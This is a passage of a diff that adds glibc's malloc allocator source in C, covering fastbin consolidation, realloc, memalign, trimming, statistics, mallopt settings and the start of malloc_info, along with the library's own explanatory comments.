+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from fast bin and consolidate it, placing it
+    then in unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  checked_request2size (bytes, nb);
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+
+  /* Check for overflow.  */
+  if (nb > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+
+    { /*
+                Find an aligned spot inside chunk.  Since we need to give back
+                leading space in a chunk of at least MINSIZE, if the first
+                calculation places us at a spot with less than MINSIZE leader,
+                we can move to the next aligned spot -- we've allocated enough
+                total room so that this is always possible.
+                 */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
+              {
+                /* See whether the chunk contains at least one unused page.  */
+                char *paligned_mem = (char *) (((uintptr_t) p
+                                                + sizeof (struct malloc_chunk)
+                                                + psm1) & ~psm1);
+
+                assert ((char *) chunk2mem (p) + 4 * SIZE_SZ <= paligned_mem);
+                assert ((char *) p + size > paligned_mem);
+
+                /* This is the size we could potentially free.  */
+                size -= paligned_mem - (char *) p;
+
+                if (size > psm1)
+                  {
+#if MALLOC_DEBUG
+                    /* When debugging we simulate destroying the memory
+                       content.  */
+                    memset (paligned_mem, 0x89, size & ~psm1);
+#endif
+                    __madvise (paligned_mem, size & ~psm1, MADV_DONTNEED);
+
+                    result = 1;
+                  }
+              }
+          }
+      }
+
+#ifndef MORECORE_CANNOT_TRIM
+  return result | (av == &main_arena ? systrim (pad, av) : 0);
+
+#else
+  return result;
+#endif
+}
+
+
+int
+__malloc_trim (size_t s)
+{
+  int result = 0;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      result |= mtrim (ar_ptr, s);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return result;
+}
+
+
+/*
+   ------------------------- malloc_usable_size -------------------------
+ */
+
+static size_t
+musable (void *mem)
+{
+  mchunkptr p;
+  if (mem != 0)
+    {
+      p = mem2chunk (mem);
+
+      if (__builtin_expect (using_malloc_checking == 1, 0))
+        return malloc_check_get_size (p);
+
+      if (chunk_is_mmapped (p))
+	{
+	  if (DUMPED_MAIN_ARENA_CHUNK (p))
+	    return chunksize (p) - SIZE_SZ;
+	  else
+	    return chunksize (p) - 2 * SIZE_SZ;
+	}
+      else if (inuse (p))
+        return chunksize (p) - SIZE_SZ;
+    }
+  return 0;
+}
+
+
+size_t
+__malloc_usable_size (void *m)
+{
+  size_t result;
+
+  result = musable (m);
+  return result;
+}
+
+/*
+   ------------------------------ mallinfo ------------------------------
+   Accumulate malloc statistics for arena AV into M.
+ */
+
+static void
+int_mallinfo (mstate av, struct mallinfo *m)
+{
+  size_t i;
+  mbinptr b;
+  mchunkptr p;
+  INTERNAL_SIZE_T avail;
+  INTERNAL_SIZE_T fastavail;
+  int nblocks;
+  int nfastblocks;
+
+  check_malloc_state (av);
+
+  /* Account for top */
+  avail = chunksize (av->top);
+  nblocks = 1;  /* top always exists */
+
+  /* traverse fastbins */
+  nfastblocks = 0;
+  fastavail = 0;
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      for (p = fastbin (av, i); p != 0; p = p->fd)
+        {
+          ++nfastblocks;
+          fastavail += chunksize (p);
+        }
+    }
+
+  avail += fastavail;
+
+  /* traverse regular bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+      for (p = last (b); p != b; p = p->bk)
+        {
+          ++nblocks;
+          avail += chunksize (p);
+        }
+    }
+
+  m->smblks += nfastblocks;
+  m->ordblks += nblocks;
+  m->fordblks += avail;
+  m->uordblks += av->system_mem - avail;
+  m->arena += av->system_mem;
+  m->fsmblks += fastavail;
+  if (av == &main_arena)
+    {
+      m->hblks = mp_.n_mmaps;
+      m->hblkhd = mp_.mmapped_mem;
+      m->usmblks = 0;
+      m->keepcost = chunksize (av->top);
+    }
+}
+
+
+struct mallinfo
+__libc_mallinfo (void)
+{
+  struct mallinfo m;
+  mstate ar_ptr;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  memset (&m, 0, sizeof (m));
+  ar_ptr = &main_arena;
+  do
+    {
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &m);
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  return m;
+}
+
+/*
+   ------------------------------ malloc_stats ------------------------------
+ */
+
+void
+__malloc_stats (void)
+{
+  int i;
+  mstate ar_ptr;
+  unsigned int in_use_b = mp_.mmapped_mem, system_b = in_use_b;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  _IO_flockfile (stderr);
+  int old_flags2 = stderr->_flags2;
+  stderr->_flags2 |= _IO_FLAGS2_NOTCANCEL;
+  for (i = 0, ar_ptr = &main_arena;; i++)
+    {
+      struct mallinfo mi;
+
+      memset (&mi, 0, sizeof (mi));
+      __libc_lock_lock (ar_ptr->mutex);
+      int_mallinfo (ar_ptr, &mi);
+      fprintf (stderr, "Arena %d:\n", i);
+      fprintf (stderr, "system bytes     = %10u\n", (unsigned int) mi.arena);
+      fprintf (stderr, "in use bytes     = %10u\n", (unsigned int) mi.uordblks);
+#if MALLOC_DEBUG > 1
+      if (i > 0)
+        dump_heap (heap_for_ptr (top (ar_ptr)));
+#endif
+      system_b += mi.arena;
+      in_use_b += mi.uordblks;
+      __libc_lock_unlock (ar_ptr->mutex);
+      ar_ptr = ar_ptr->next;
+      if (ar_ptr == &main_arena)
+        break;
+    }
+  fprintf (stderr, "Total (incl. mmap):\n");
+  fprintf (stderr, "system bytes     = %10u\n", system_b);
+  fprintf (stderr, "in use bytes     = %10u\n", in_use_b);
+  fprintf (stderr, "max mmap regions = %10u\n", (unsigned int) mp_.max_n_mmaps);
+  fprintf (stderr, "max mmap bytes   = %10lu\n",
+           (unsigned long) mp_.max_mmapped_mem);
+  stderr->_flags2 = old_flags2;
+  _IO_funlockfile (stderr);
+}
+
+
+/*
+   ------------------------------ mallopt ------------------------------
+ */
+static inline int
+__always_inline
+do_set_trim_threshold (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_trim_threshold, 3, value, mp_.trim_threshold,
+	      mp_.no_dyn_threshold);
+  mp_.trim_threshold = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_top_pad (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_top_pad, 3, value, mp_.top_pad,
+	      mp_.no_dyn_threshold);
+  mp_.top_pad = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mmap_threshold (size_t value)
+{
+  /* Forbid setting the threshold too high.  */
+  if (value <= HEAP_MAX_SIZE / 2)
+    {
+      LIBC_PROBE (memory_mallopt_mmap_threshold, 3, value, mp_.mmap_threshold,
+		  mp_.no_dyn_threshold);
+      mp_.mmap_threshold = value;
+      mp_.no_dyn_threshold = 1;
+      return 1;
+    }
+  return 0;
+}
+
+static inline int
+__always_inline
+do_set_mmaps_max (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_mmap_max, 3, value, mp_.n_mmaps_max,
+	      mp_.no_dyn_threshold);
+  mp_.n_mmaps_max = value;
+  mp_.no_dyn_threshold = 1;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_mallopt_check (int32_t value)
+{
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_perturb_byte (int32_t value)
+{
+  LIBC_PROBE (memory_mallopt_perturb, 2, value, perturb_byte);
+  perturb_byte = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_test (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_test, 2, value, mp_.arena_test);
+  mp_.arena_test = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_arena_max (size_t value)
+{
+  LIBC_PROBE (memory_mallopt_arena_max, 2, value, mp_.arena_max);
+  mp_.arena_max = value;
+  return 1;
+}
+
+#if USE_TCACHE
+static inline int
+__always_inline
+do_set_tcache_max (size_t value)
+{
+  if (value >= 0 && value <= MAX_TCACHE_SIZE)
+    {
+      LIBC_PROBE (memory_tunable_tcache_max_bytes, 2, value, mp_.tcache_max_bytes);
+      mp_.tcache_max_bytes = value;
+      mp_.tcache_bins = csize2tidx (request2size(value)) + 1;
+    }
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_count (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_count, 2, value, mp_.tcache_count);
+  mp_.tcache_count = value;
+  return 1;
+}
+
+static inline int
+__always_inline
+do_set_tcache_unsorted_limit (size_t value)
+{
+  LIBC_PROBE (memory_tunable_tcache_unsorted_limit, 2, value, mp_.tcache_unsorted_limit);
+  mp_.tcache_unsorted_limit = value;
+  return 1;
+}
+#endif
+
+int
+__libc_mallopt (int param_number, int value)
+{
+  mstate av = &main_arena;
+  int res = 1;
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+  __libc_lock_lock (av->mutex);
+
+  LIBC_PROBE (memory_mallopt, 2, param_number, value);
+
+  /* We must consolidate main arena before changing max_fast
+     (see definition of set_max_fast).  */
+  malloc_consolidate (av);
+
+  switch (param_number)
+    {
+    case M_MXFAST:
+      if (value >= 0 && value <= MAX_FAST_SIZE)
+        {
+          LIBC_PROBE (memory_mallopt_mxfast, 2, value, get_max_fast ());
+          set_max_fast (value);
+        }
+      else
+        res = 0;
+      break;
+
+    case M_TRIM_THRESHOLD:
+      do_set_trim_threshold (value);
+      break;
+
+    case M_TOP_PAD:
+      do_set_top_pad (value);
+      break;
+
+    case M_MMAP_THRESHOLD:
+      res = do_set_mmap_threshold (value);
+      break;
+
+    case M_MMAP_MAX:
+      do_set_mmaps_max (value);
+      break;
+
+    case M_CHECK_ACTION:
+      do_set_mallopt_check (value);
+      break;
+
+    case M_PERTURB:
+      do_set_perturb_byte (value);
+      break;
+
+    case M_ARENA_TEST:
+      if (value > 0)
+	do_set_arena_test (value);
+      break;
+
+    case M_ARENA_MAX:
+      if (value > 0)
+	do_set_arena_max (value);
+      break;
+    }
+  __libc_lock_unlock (av->mutex);
+  return res;
+}
+libc_hidden_def (__libc_mallopt)
+
+
+/*
+   -------------------- Alternative MORECORE functions --------------------
+ */
+
+
+/*
+   General Requirements for MORECORE.
+
+   The MORECORE function must have the following properties:
+
+   If MORECORE_CONTIGUOUS is false:
+
+ * MORECORE must allocate in multiples of pagesize. It will
+      only be called with arguments that are multiples of pagesize.
+
+ * MORECORE(0) must return an address that is at least
+      MALLOC_ALIGNMENT aligned. (Page-aligning always suffices.)
+
+   else (i.e. If MORECORE_CONTIGUOUS is true):
+
+ * Consecutive calls to MORECORE with positive arguments
+      return increasing addresses, indicating that space has been
+      contiguously extended.
+
+ * MORECORE need not allocate in multiples of pagesize.
+      Calls to MORECORE need not have args of multiples of pagesize.
+
+ * MORECORE need not page-align.
+
+   In either case:
+
+ * MORECORE may allocate more memory than requested. (Or even less,
+      but this will generally result in a malloc failure.)
+
+ * MORECORE must not allocate memory when given argument zero, but
+      instead return one past the end address of memory from previous
+      nonzero call. This malloc does NOT call MORECORE(0)
+      until at least one call with positive arguments is made, so
+      the initial value returned is not important.
+
+ * Even though consecutive calls to MORECORE need not return contiguous
+      addresses, it must be OK for malloc'ed chunks to span multiple
+      regions in those cases where they do happen to be contiguous.
+
+ * MORECORE need not handle negative arguments -- it may instead
+      just return MORECORE_FAILURE when given negative arguments.
+      Negative arguments are always multiples of pagesize. MORECORE
+      must not misinterpret negative args as large positive unsigned
+      args. You can suppress all such calls from even occurring by defining
+      MORECORE_CANNOT_TRIM,
+
+   There is some variation across systems about the type of the
+   argument to sbrk/MORECORE. If size_t is unsigned, then it cannot
+   actually be size_t, because sbrk supports negative args, so it is
+   normally the signed type of the same width as size_t (sometimes
+   declared as "intptr_t", and sometimes "ptrdiff_t").  It doesn't much
+   matter though. Internally, we use "long" as arguments, which should
+   work across all reasonable possibilities.
+
+   Additionally, if MORECORE ever returns failure for a positive
+   request, then mmap is used as a noncontiguous system allocator. This
+   is a useful backup strategy for systems with holes in address spaces
+   -- in this case sbrk cannot contiguously expand the heap, but mmap
+   may be able to map noncontiguous space.
+
+   If you'd like mmap to ALWAYS be used, you can define MORECORE to be
+   a function that always returns MORECORE_FAILURE.
+
+   If you are using this malloc with something other than sbrk (or its
+   emulation) to supply memory regions, you probably want to set
+   MORECORE_CONTIGUOUS as false.  As an example, here is a custom
+   allocator kindly contributed for pre-OSX macOS.  It uses virtually
+   but not necessarily physically contiguous non-paged memory (locked
+   in, present and won't get swapped out).  You can use it by
+   uncommenting this section, adding some #includes, and setting up the
+   appropriate defines above:
+
+ *#define MORECORE osMoreCore
+ *#define MORECORE_CONTIGUOUS 0
+
+   There is also a shutdown routine that should somehow be called for
+   cleanup upon program exit.
+
+ *#define MAX_POOL_ENTRIES 100
+ *#define MINIMUM_MORECORE_SIZE  (64 * 1024)
+   static int next_os_pool;
+   void *our_os_pools[MAX_POOL_ENTRIES];
+
+   void *osMoreCore(int size)
+   {
+    void *ptr = 0;
+    static void *sbrk_top = 0;
+
+    if (size > 0)
+    {
+      if (size < MINIMUM_MORECORE_SIZE)
+         size = MINIMUM_MORECORE_SIZE;
+      if (CurrentExecutionLevel() == kTaskLevel)
+         ptr = PoolAllocateResident(size + RM_PAGE_SIZE, 0);
+      if (ptr == 0)
+      {
+        return (void *) MORECORE_FAILURE;
+      }
+      // save ptrs so they can be freed during cleanup
+      our_os_pools[next_os_pool] = ptr;
+      next_os_pool++;
+      ptr = (void *) ((((unsigned long) ptr) + RM_PAGE_MASK) & ~RM_PAGE_MASK);
+      sbrk_top = (char *) ptr + size;
+      return ptr;
+    }
+    else if (size < 0)
+    {
+      // we don't currently support shrink behavior
+      return (void *) MORECORE_FAILURE;
+    }
+    else
+    {
+      return sbrk_top;
+    }
+   }
+
+   // cleanup any allocated memory pools
+   // called as last thing before shutting down driver
+
+   void osCleanupMem(void)
+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
